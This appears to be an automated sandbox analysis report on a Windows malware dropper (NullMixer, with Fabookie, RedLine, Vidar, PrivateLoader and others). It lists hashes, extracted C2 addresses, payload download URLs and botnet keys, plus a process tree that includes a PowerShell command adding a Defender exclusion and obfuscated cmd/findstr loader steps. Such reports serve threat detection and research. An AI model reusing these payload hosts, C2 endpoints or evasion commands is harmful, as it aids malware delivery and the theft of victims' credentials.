fabookie | 93ac84d519edb6350cf53736449330985fe1cb52eff043857daf6cca916d6fa3

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
25-10-2022 17:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

93AC84D519EDB6350CF53736449330985FE1CB52EFF04.exe
Size

4.6MB
MD5

bebfa25ff4e87540fd63b3c49cde912d
SHA1

8264a0c923f846422be4fb6d29991b091c034362
SHA256

93ac84d519edb6350cf53736449330985fe1cb52eff043857daf6cca916d6fa3
SHA512

27aa2e092245ad246b1df1040cfc4fb46f7aa9fd50e4ab1919628e95f7aad96391a966b1ba49e6057032c3fda7998f8cbbe34d1c54fbd9a0b021798de52d6159
SSDEEP

98304:xCCvLUBsg3O305JTOzlgZasmlIfZnPO9N8r6YPXZP0ZPyUZwXXwSkYW:xzLUCg314lpl8OYPXZIqJwh

Malware Config

Extracted

Family

nullmixer

http://hsiens.xyz/

Extracted

Family

privateloader

http://37.0.10.214/proxies.txt

http://37.0.10.244/server.txt

http://wfsdragon.ru/api/setStats.php

37.0.10.237

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

http://163.123.143.4/proxies.txt

http://107.182.129.251/server.txt

pastebin.com/raw/A7dSG1te

163.123.143.12

Attributes

payload_url
https://cdn.discordapp.com/attachments/1003879548242374749/1003976870611669043/NiceProcessX64.bmp
https://cdn.discordapp.com/attachments/1003879548242374749/1003976754358124554/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Extracted

Family

vidar

Version

40.1

Botnet

706

https://eduarroma.tumblr.com/

Attributes

profile_id
706

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

51.89.201.21:7161

Attributes

auth_value
3a050df92d0cf082b2cdaf87863616be

Extracted

Family

nymaim

45.139.105.171

85.31.46.167

Extracted

Family

redline

Botnet

6.4

103.89.90.61:34589

Attributes

auth_value
a7a3522462b1f9687c4ead2995816370

Extracted

Family

redline

Botnet

1310

79.137.192.57:48771

Attributes

auth_value
feb5f5c29913f32658637e553762a40e

Extracted

Family

redline

Botnet

new10251

denestyenol.xyz:81

exirdonanos.xyz:81

Attributes

auth_value
160af15bf479222e63e4174f38e16073

Extracted

Family

vidar

Version

55.2

Botnet

937

https://t.me/slivetalks

https://c.im/@xinibin420

Attributes

profile_id
937

Extracted

Family

redline

Botnet

80.76.51.172:19241

Attributes

auth_value
4b711fa6f9a5187b40500266349c0baf

Signatures

Detect Fabookie payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun165e1a9a5b6d67.exe	family_fabookie
C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun165e1a9a5b6d67.exe	family_fabookie

Detects Smokeloader packer 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4948-213-0x00000000024E0000-0x00000000024E9000-memory.dmp	family_smokeloader

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	82020	25440	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8516	25440	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/17224-304-0x00000000005C0000-0x00000000005E8000-memory.dmp	family_redline
behavioral2/memory/1408-314-0x00000000005E0000-0x0000000000698000-memory.dmp	family_redline
behavioral2/memory/40156-321-0x0000000000E00000-0x0000000000E28000-memory.dmp	family_redline
behavioral2/memory/49688-323-0x00000000006B0000-0x00000000006D8000-memory.dmp	family_redline
behavioral2/memory/81620-340-0x0000000000910000-0x0000000000938000-memory.dmp	family_redline
behavioral2/memory/57932-401-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2568-218-0x0000000004060000-0x00000000040FD000-memory.dmp	family_vidar
behavioral2/memory/2568-219-0x0000000000400000-0x00000000023FF000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\libcurl.dll	aspack_v212_v242

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 11 IoCs

Processes:

setup_install.exeSun16b474c952015e.exeSun16867e08e089be.exeSun165e1a9a5b6d67.exeSun16d537c60c.exeSun16f0eb81a9f134ace.exeSun16be7a530c482.exeSun16a363382a5.exeSun16f35c28ec49.exeSun16a4cee93fc60.exeSun16b474c952015e.exe

pid	process
3624	setup_install.exe
4732	Sun16b474c952015e.exe
4044	Sun16867e08e089be.exe
2324	Sun165e1a9a5b6d67.exe
4948	Sun16d537c60c.exe
2568	Sun16f0eb81a9f134ace.exe
4820	Sun16be7a530c482.exe
1552	Sun16a363382a5.exe
2728	Sun16f35c28ec49.exe
2156	Sun16a4cee93fc60.exe
4080	Sun16b474c952015e.exe

Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

82380 netsh.exe

pid	process
82380	netsh.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\ws3RzBSjG5YLeEUrkaSLPWVu.exe	upx
C:\Users\Admin\Pictures\Adobe Films\ws3RzBSjG5YLeEUrkaSLPWVu.exe	upx
behavioral2/memory/1104-292-0x0000000000390000-0x00000000011D1000-memory.dmp	upx

VMProtect packed file 5 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\Dd57LjHlu5Qcy5x4fmaSHwTd.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\Dd57LjHlu5Qcy5x4fmaSHwTd.exe	vmprotect
behavioral2/memory/4568-290-0x0000000140000000-0x0000000140623000-memory.dmp	vmprotect
behavioral2/memory/3772-383-0x0000000140000000-0x0000000140623000-memory.dmp	vmprotect
behavioral2/memory/7520-429-0x0000000140000000-0x0000000140619000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

93AC84D519EDB6350CF53736449330985FE1CB52EFF04.exeSun16b474c952015e.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	93AC84D519EDB6350CF53736449330985FE1CB52EFF04.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Sun16b474c952015e.exe

Loads dropped DLL 6 IoCs

Processes:

setup_install.exe

pid process

3624 setup_install.exe
3624 setup_install.exe
3624 setup_install.exe
3624 setup_install.exe
3624 setup_install.exe
3624 setup_install.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Sun16be7a530c482.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	Sun16be7a530c482.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Sun16be7a530c482.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

219 ipinfo.io
12 ip-api.com
29 ipinfo.io
31 ipinfo.io
182 ipinfo.io
183 ipinfo.io
218 ipinfo.io
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

40492 sc.exe
82004 sc.exe
82160 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
219	ipinfo.io
12	ip-api.com
29	ipinfo.io
31	ipinfo.io
182	ipinfo.io
183	ipinfo.io
218	ipinfo.io

pid	process
40492	sc.exe
82004	sc.exe
82160	sc.exe

Program crash 20 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1996	3624	WerFault.exe	setup_install.exe
4020	2568	WerFault.exe	Sun16f0eb81a9f134ace.exe
81856	448	WerFault.exe	bMKWccUjfCpRQTzCgoIRSMAg.exe
82200	82032	WerFault.exe	rundll32.exe
82476	3496	WerFault.exe	OhAqYQiCXZEVkhmIgypf4k0Z.exe
82924	2768	WerFault.exe	b8NKSWwKtCkOn8A6hSu9q_Nb.exe
8056	6892	WerFault.exe	GcleanerEU.exe
8344	7112	WerFault.exe	gcleaner.exe
8412	6892	WerFault.exe	GcleanerEU.exe
8540	6892	WerFault.exe	GcleanerEU.exe
8620	8528	WerFault.exe	rundll32.exe
8696	81868	WerFault.exe	UoU4TpMWFdpEzKbmL3qlK6YI.exe
8852	6892	WerFault.exe	GcleanerEU.exe
8864	7112	WerFault.exe	gcleaner.exe
8956	6892	WerFault.exe	GcleanerEU.exe
9056	7112	WerFault.exe	gcleaner.exe
9156	6892	WerFault.exe	GcleanerEU.exe
9276	7112	WerFault.exe	gcleaner.exe
9368	6892	WerFault.exe	GcleanerEU.exe
9424	7112	WerFault.exe	gcleaner.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

81820 schtasks.exe
81848 schtasks.exe
4004 schtasks.exe
1364 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

81984 timeout.exe
82848 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

82172 taskkill.exe
5184 taskkill.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4600 PING.EXE

pid	process
81820	schtasks.exe
81848	schtasks.exe
4004	schtasks.exe
1364	schtasks.exe

pid	process
81984	timeout.exe
82848	timeout.exe

pid	process
82172	taskkill.exe
5184	taskkill.exe

pid	process
4600	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	192	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	454	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

2076 powershell.exe
2076 powershell.exe

pid	process
2076	powershell.exe
2076	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

Sun16a4cee93fc60.exeSun16867e08e089be.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2156	Sun16a4cee93fc60.exe
Token: SeDebugPrivilege	4044	Sun16867e08e089be.exe
Token: SeDebugPrivilege	2076	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

93AC84D519EDB6350CF53736449330985FE1CB52EFF04.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeSun16b474c952015e.exeSun16be7a530c482.exe

description	pid	process	target process
PID 2468 wrote to memory of 3624	2468	93AC84D519EDB6350CF53736449330985FE1CB52EFF04.exe	setup_install.exe
PID 2468 wrote to memory of 3624	2468	93AC84D519EDB6350CF53736449330985FE1CB52EFF04.exe	setup_install.exe
PID 2468 wrote to memory of 3624	2468	93AC84D519EDB6350CF53736449330985FE1CB52EFF04.exe	setup_install.exe
PID 3624 wrote to memory of 1300	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 1300	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 1300	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 1220	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 1220	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 1220	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 1440	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 1440	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 1440	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 4988	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 4988	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 4988	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 516	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 516	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 516	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 2524	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 2524	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 2524	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 3480	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 3480	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 3480	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 4032	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 4032	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 4032	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 4968	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 4968	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 4968	3624	setup_install.exe	cmd.exe
PID 1220 wrote to memory of 4732	1220	cmd.exe	Sun16b474c952015e.exe
PID 1220 wrote to memory of 4732	1220	cmd.exe	Sun16b474c952015e.exe
PID 1220 wrote to memory of 4732	1220	cmd.exe	Sun16b474c952015e.exe
PID 3624 wrote to memory of 532	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 532	3624	setup_install.exe	cmd.exe
PID 3624 wrote to memory of 532	3624	setup_install.exe	cmd.exe
PID 4032 wrote to memory of 4044	4032	cmd.exe	Sun16867e08e089be.exe
PID 4032 wrote to memory of 4044	4032	cmd.exe	Sun16867e08e089be.exe
PID 4988 wrote to memory of 2324	4988	cmd.exe	Sun165e1a9a5b6d67.exe
PID 4988 wrote to memory of 2324	4988	cmd.exe	Sun165e1a9a5b6d67.exe
PID 1300 wrote to memory of 2076	1300	cmd.exe	powershell.exe
PID 1300 wrote to memory of 2076	1300	cmd.exe	powershell.exe
PID 1300 wrote to memory of 2076	1300	cmd.exe	powershell.exe
PID 1440 wrote to memory of 4948	1440	cmd.exe	Sun16d537c60c.exe
PID 1440 wrote to memory of 4948	1440	cmd.exe	Sun16d537c60c.exe
PID 1440 wrote to memory of 4948	1440	cmd.exe	Sun16d537c60c.exe
PID 516 wrote to memory of 2568	516	cmd.exe	Sun16f0eb81a9f134ace.exe
PID 516 wrote to memory of 2568	516	cmd.exe	Sun16f0eb81a9f134ace.exe
PID 516 wrote to memory of 2568	516	cmd.exe	Sun16f0eb81a9f134ace.exe
PID 4968 wrote to memory of 4820	4968	cmd.exe	Sun16be7a530c482.exe
PID 4968 wrote to memory of 4820	4968	cmd.exe	Sun16be7a530c482.exe
PID 4968 wrote to memory of 4820	4968	cmd.exe	Sun16be7a530c482.exe
PID 3480 wrote to memory of 1552	3480	cmd.exe	Sun16a363382a5.exe
PID 3480 wrote to memory of 1552	3480	cmd.exe	Sun16a363382a5.exe
PID 3480 wrote to memory of 1552	3480	cmd.exe	Sun16a363382a5.exe
PID 532 wrote to memory of 2156	532	cmd.exe	Sun16a4cee93fc60.exe
PID 532 wrote to memory of 2156	532	cmd.exe	Sun16a4cee93fc60.exe
PID 2524 wrote to memory of 2728	2524	cmd.exe	Sun16f35c28ec49.exe
PID 2524 wrote to memory of 2728	2524	cmd.exe	Sun16f35c28ec49.exe
PID 2524 wrote to memory of 2728	2524	cmd.exe	Sun16f35c28ec49.exe
PID 4732 wrote to memory of 4080	4732	Sun16b474c952015e.exe	Sun16b474c952015e.exe
PID 4732 wrote to memory of 4080	4732	Sun16b474c952015e.exe	Sun16b474c952015e.exe
PID 4732 wrote to memory of 4080	4732	Sun16b474c952015e.exe	Sun16b474c952015e.exe
PID 4820 wrote to memory of 1460	4820	Sun16be7a530c482.exe	dllhost.exe

C:\Users\Admin\AppData\Local\Temp\93AC84D519EDB6350CF53736449330985FE1CB52EFF04.exe
"C:\Users\Admin\AppData\Local\Temp\93AC84D519EDB6350CF53736449330985FE1CB52EFF04.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2468

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
3⤵
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun16b474c952015e.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1220

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun16b474c952015e.exe
Sun16b474c952015e.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4732

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun16b474c952015e.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun16b474c952015e.exe" -a
5⤵
- Executes dropped EXE
PID:4080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun165e1a9a5b6d67.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4988

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun165e1a9a5b6d67.exe
Sun165e1a9a5b6d67.exe
4⤵
- Executes dropped EXE
PID:2324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun16f35c28ec49.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2524

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun16f35c28ec49.exe
Sun16f35c28ec49.exe
4⤵
- Executes dropped EXE
PID:2728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun16f0eb81a9f134ace.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:516

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun16f0eb81a9f134ace.exe
Sun16f0eb81a9f134ace.exe
4⤵
- Executes dropped EXE
PID:2568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 1028
5⤵
- Program crash
PID:4020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun16867e08e089be.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4032

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun16867e08e089be.exe
Sun16867e08e089be.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun16a4cee93fc60.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:532

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun16a4cee93fc60.exe
Sun16a4cee93fc60.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun16be7a530c482.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4968

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun16be7a530c482.exe
Sun16be7a530c482.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4820

C:\Windows\SysWOW64\dllhost.exe
dllhost.exe
5⤵
PID:1460

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Sfaldavano.xls
5⤵
PID:2752

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:3640

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^fARmmICHAETEVIAiewsqLILJhRoBwBFrurUNyycHHdHtUkLfezrMoLJHPojHmwGYYPnRONeXFJaxqGOwySnHnTVxzjYWSOiGKIutNTBfsuin$" Serravano.xls
7⤵
PID:1344

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
Amica.exe.com Y
7⤵
PID:1784

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
8⤵
PID:1156

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
9⤵
PID:26508

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
10⤵
PID:57896

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
11⤵
PID:1320

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
12⤵
PID:82228

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
13⤵
PID:82652

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
14⤵
PID:57896

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
15⤵
PID:1300

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
16⤵
PID:82808

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
17⤵
PID:3732

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
18⤵
PID:2124

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
19⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
20⤵
PID:6684

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
21⤵
PID:7004

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
22⤵
PID:7384

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
23⤵
PID:8016

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
24⤵
PID:8312

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
25⤵
PID:8480

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
26⤵
PID:8760

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
27⤵
PID:8976

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
28⤵
PID:9180

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y
29⤵
PID:9384

C:\Windows\SysWOW64\PING.EXE
ping IYMUGYHL -n 30
7⤵
- Runs ping.exe
PID:4600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun16a363382a5.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3480

C:\Users\Admin\AppData\Local\Temp\7zS4A90F0B6\Sun16a363382a5.exe
Sun16a363382a5.exe
4⤵
- Executes dropped EXE
PID:1552

C:\Users\Admin\Pictures\Adobe Films\bQchxK_D_6yItRFRjgz1AziC.exe
"C:\Users\Admin\Pictures\Adobe Films\bQchxK_D_6yItRFRjgz1AziC.exe"
5⤵
PID:5052

C:\Users\Admin\Pictures\Adobe Films\bQchxK_D_6yItRFRjgz1AziC.exe
"C:\Users\Admin\Pictures\Adobe Films\bQchxK_D_6yItRFRjgz1AziC.exe" -q
6⤵
